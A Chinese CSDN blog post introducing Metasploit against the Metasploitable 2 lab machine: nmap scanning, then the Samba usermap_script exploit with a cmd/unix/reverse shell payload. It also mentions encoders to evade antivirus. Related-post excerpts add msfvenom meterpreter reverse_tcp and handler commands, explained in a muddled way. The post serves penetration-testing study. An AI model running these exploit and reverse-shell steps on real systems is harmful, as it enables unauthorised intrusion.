Metasploit技术初入门01

最新推荐文章于 2024-03-29 10:11:31 发布
最新推荐文章于 2024-03-29 10:11:31 发布
阅读量254 收藏 1
点赞数
分类专栏: Web安全 文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wm_nnxx/article/details/106601478
版权

简介和开启

开启命令:msfconsole
开启界面如下:
在这里插入图片描述
MSF框架主要有五个模块组成,分别是
1 辅助模块
2 漏洞利用模块
3 攻击载荷模块
4 后期渗透模块
5 编码工具模块

渗透攻击步骤主要有:
1 扫描目标机系统,寻找可用漏洞
2 选择并配置一个漏洞利用模块
3 选择并配置一个攻击载荷模块
4 选择一个编码技术,用来绕过杀毒软件的查杀
5 渗透攻击

辅助模块的使用

本次使用的被攻击主机是Metasploitable 2,专门实验用的,自己百度装。
渗透测试的第一步是信息收集,所以我们在这里需要做的是主机扫描,主要关注IP地址,开放的服务和端口等。

使用辅助模块进行端口扫描,这里使用search命令搜索端口模块
在这里插入图片描述使用use选择模块,使用 show options查看参数设置,使用set 命令设置参数,run命令开始模块进程
在这里插入图片描述在这里插入图片描述如果发现启动不了,或者没结果等等破问题,重启你们的虚拟机,重启大法好啊!辅助模块种类特别多,多用就知道了,用法都差不多,不会就百度。

也可以用namp来替代辅助模块,直接输入nmap开启就行,然后输入命令nmap -O -Pn/-p0 URL命令 pn和p0就是不适用ping的方式
在这里插入图片描述

漏洞利用模块的使用

nmap查询开放的端口和开启的服务,命令是nmap -sV
在这里插入图片描述我们发现一个叫samba的服务,然后开始寻找对应的漏洞利用模块,命令search samba
在这里插入图片描述发现一个exploit/multi/samba/usermap_script 评价是excellent 而且比较新,就用它了
在这里插入图片描述
可以使用 info exploit/multi/samba/usermap_script 查看它的信息

在这里插入图片描述

使用use exploit/multi/samba/usermap_script 就可以用找个模块了
在这里插入图片描述

使用攻击载荷模块

使用show 命令查看该漏洞利用模块下有哪些攻击载荷模块
在这里插入图片描述根据我们之前nmap得到该系统是linux,所以选择linux对应的模块就行,我们选一个 cmd/unix/reverse,使用set命令选择它,看图 set PAYLOAD cmd/unix/reverse,然后show命令看它的参数
在这里插入图片描述使用set命令设置参数,RHOSET就是被攻击的IP,RPORT就是被攻击的端口,之前nmap扫出来的对应服务端口,相反L开头的就是主动攻击的IP和端口
在这里插入图片描述设置好后 run或者exploit命令开始攻击
在这里插入图片描述然后就得到个shell了

在这里插入图片描述shell已经建立,歇口气,接下来就是后渗透阶段了,这部分就厉害了,下次再说。

梦想成为安全大佬的男人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞利用一:MSF 漏洞验证专题
ZY95001的博客
09-04 3287
一、MSF介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。 兼有windows与linux两种版本。 二、相关专业术语 1.渗透攻击(Exploit):...
Metasploit技术入门02
WM_NNXX的博客
06-27 256
metasploit的模块主要有五个,辅助模块,漏洞利用模块,攻击载荷模块,后期渗透模块,编码工具模块 在上一篇中我们依次使用了前三个模块,并拿到了一个目标机的shell,接下来就是后期渗透模块的使用了。metasploit主要提供了一个叫meterpreter的后期渗透工具,比较好用。 使用后期渗透模块-工具meterpreter 我们已经得到了一个shell,因为这个shell可能不稳定,所以接下来要迁移这个shell,将它和目标机的一个稳定的进程绑定一起。 首先使用ps命令查看目标机已运行的进程,然后
渗透学习 | Metasploit技术
m_de_g的博客
08-23 304
1.Metasploit简介 Metasploit是当前信息安全与渗透测试领域最流行的术语,它完全颠覆了已有的渗透测试方式。几乎所有流行的操作系统都支持Metasploit,而且Metasploit框架在这些系统上的工作流程基本都一样。 Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 Metasploit可向后端模块提供多种用来控制测试的接口(如
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4317
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
MSF(Metasploit)渗透测试---黑客工具使用指南
GitHub质检员
11-17 448
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。
msf使用
温和的跳跃
01-17 271
这个还是要学学,我感觉还可以。工具学学bp sqlmap namp msf应该差不多可以了。这个比其他的几个复杂一些。这篇文章马上安排上
MSF的使用教程
热门推荐
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 MetasploitMSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
网络安全:MSF常用命令总结
Mr_qing的博客
11-03 1850
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
msf介绍及其常用模块
bwt_D的博客
03-01 5620
技术功能模块 exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法 payload:成功exploit之后,真正在目标系统执行的代码或指令 auxiliary:执行信息收集、枚举、指纹探测、扫描等功能的辅助模块 encoders:对payload进行加密,躲避av检查的模块 nops:提高payload稳定性及维持大小 generate常用选项解释: -b 去掉坏字符,例如:-b ‘\x00\xff’ -e 设置编码方式,可以使用show encoders命令查看所有编码方式 -
Metasploit技术
Teemos的博客
09-17 1627
1 metasploit介绍 metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模块化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 metasploit可向后端模块提供多种用来控制测试的接口(如控制台、web、CLI)。通过控制台接口,还可以访问和使用所有metasploit的插件,例如payload、利用模块、post模块等。此外,metasploit还有第三方程序的接口,如nmap和sqlmap
metasploit入门用法
06-03
metasploit中exploit模块的使用流程
metasploit入门视频教程
10-09
本视频提供了metasploit的使用的入门教程,有完全的教学视频过程,演示与结果。
信息安全技术Metasploit介绍.pptx
11-01
信息安全技术基础
metasploit
01-02
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
最新发布
2201_75735270的博客
03-29 1932
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
Web安全攻防-----学习笔记(五)之Metasploit技术
舞指如歌~的博客
09-12 376
第5章 Metasploit技术 apt-get update:只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新。 apt-get upgrade:升级系统上安装的所有软件包,若更新失败,所涉及的包会保持更新之前的状态。 apt-get dist-upgrade:升级整个Linux系统。 5.2 Metasploit基础 5.2.1 专业术语 MSF框架由多个模...
MSF的安装与使用教程,超详细,附安装包和密钥
顶峰
09-26 4546
MSF教程
[系统安全] 三十七.Metasploit技术之基础用法万字详解及防御机理
杨秀璋的专栏
01-13 3640
系统安全将更好地帮助学者了解病毒逆向分析和系统安全。前文讲解了APT攻击中常用的攻击手段,即PowerShell和PowerSploit脚本攻击,并进一步结合MSF漏洞利用来实现脚本攻击。这篇文章将带领大家了解Metasploit技术,它和CS都是APT攻击中常见的方式,并结合作者之前的漏洞利用及WannaCry逆向经验总结。希望这篇文章对您有帮助!
Metasploit 整理笔记
不急不躁
07-12 1万+
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
Metasploit module开发入门
05-25
Metasploit是一款常用的漏洞利用工具,它主要由Ruby编写而成,能够帮助渗透测试人员、安全工程师和攻击者快速发现和利用漏洞。 在Metasploit中,可以通过编写module来扩展其功能。本文将介绍如何开发一个简单的Metasploit模块。 在开始之前,需要安装Metasploit框架。可以在官方网站(https://www.metasploit.com/)上下载并安装。 首先,我们需要创建一个新的模块。在终端中输入以下命令: ``` msfvenom --list payloads ``` 这将列出所有可用的payload。我们将使用其中的“windows/meterpreter/reverse_tcp”,该payload将在远程Windows系统上建立一个反向TCP连接。 接下来,我们需要编写一个模块,该模块将使用我们刚刚生成的payload。打开终端并输入以下命令: ``` msfconsole ``` 这将启动Metasploit控制台。接下来,输入以下命令以创建一个新的模块文件: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f raw -o payload.raw ``` 这将生成一个名为payload.raw的文件,该文件包含我们的payload。接下来,我们需要创建一个新的模块文件并将其命名为“reverse_tcp.rc”: ``` use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <your IP> set LPORT <your port> set ExitOnSession false exploit -j -z ``` 这个模块使用“exploit/multi/handler”模块来建立一个反向TCP连接。它还使用我们刚刚生成的payload并设置了LHOST和LPORT。最后,它使用“-j”选项运行模块并保持在后台。 现在,我们可以使用以下命令来运行我们的模块: ``` msfconsole -r reverse_tcp.rc ``` 这将启动Metasploit控制台并运行我们的模块。此时,Metasploit将等待远程Windows系统与我们建立反向TCP连接。 以上就是一个简单的Metasploit模块的开发过程,这只是Metasploit模块开发的入门级别。更高级的Metasploit模块可以通过编写Ruby代码来实现更复杂的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值